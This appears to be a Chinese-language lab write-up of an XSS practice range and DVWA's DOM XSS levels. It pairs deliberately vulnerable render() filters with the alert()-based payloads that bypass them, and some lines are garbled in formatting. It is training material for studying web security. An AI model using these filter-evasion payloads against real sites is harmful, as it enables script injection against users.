XSS靶场
<script>alert(1)</script></textarea><scRipt>alert(1)</scrIpt>"><script>alert(1)</script>
function render (input) {
return '<input type="name" value="' + input + '">'
}<script>alert`1`</script>
function render (input) {
const stripBracketsRe = /[()]/g
input = input.replace(stripBracketsRe, '')
return input
过滤括号
}5.<img src=x onerror="alert ( 1 )" />
屏蔽括号和反引号,利用HTML属性能够识别ASCII码进行绕过,码后面的;可加可不加
6.--!><img src=x onerror="alert ( 1 )" />
7.
type="image" src=x onerror
="alert(1)"function render (input) {
input = input.replace(/auto|on.*=|>/ig, '_')
return `<input value=1 ${input} type="text">`
}逃逸8.<img src=x onerror="alert(1)"
function render (input) {
const stripTagsRe = /<\/?[^>]+>/gi
input = input.replace(stripTagsRe, '')
return `<article>${input}</article>`
}语法松散,少输一个>也能识别9.
</style
><img src=x onerror="alert(1)" >function render (src) {
src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
return `
<style>
${src}
</style>
`
}10
http://www.segmentfault.com"></script><script>alert(1)</script>
或者
https://www.segmentfault.com" onload=alert(1)>function render (input) {
let domainRe = /^https?:\/\/www\.segmentfault\.com/
if (domainRe.test(input)) {
return `<script src="${input}"></script>`
}
return 'Invalid URL'
}b.</h1><img src=x onerror="alert ( 1 )">
function render (input) {
input = input.toUpperCase()
return `<h1>${input}</h1>`
}全部转大写,html不在意大小写,js严格区分c.<svg/onload="alert ( 1 )"
移除script,转大写,用svg
function render (input) {
input = input.replace(/script/ig, '')
input = input.toUpperCase()
return '<h1>' + input + '</h1>'
}d.
alert`1`;
-->function render (input) {
input = input.replace(/[</"']/g, '')
return `
<script>
// alert('${input}')
</script>
`
}逃逸,利用半个注释号E.利用古英语ſ来代替s
DVWA xss dom
easy :?default=English"'><script>alert(1)</script>
mid:可以看到他把<script>给过滤掉了English"'></option></select><img src=x onerror=alert(1)>
high:采用了白名单,查了下,使用注释绕过English#</option></select><img src="" οnerrοr=alert(/xss/)></option>
评论已关闭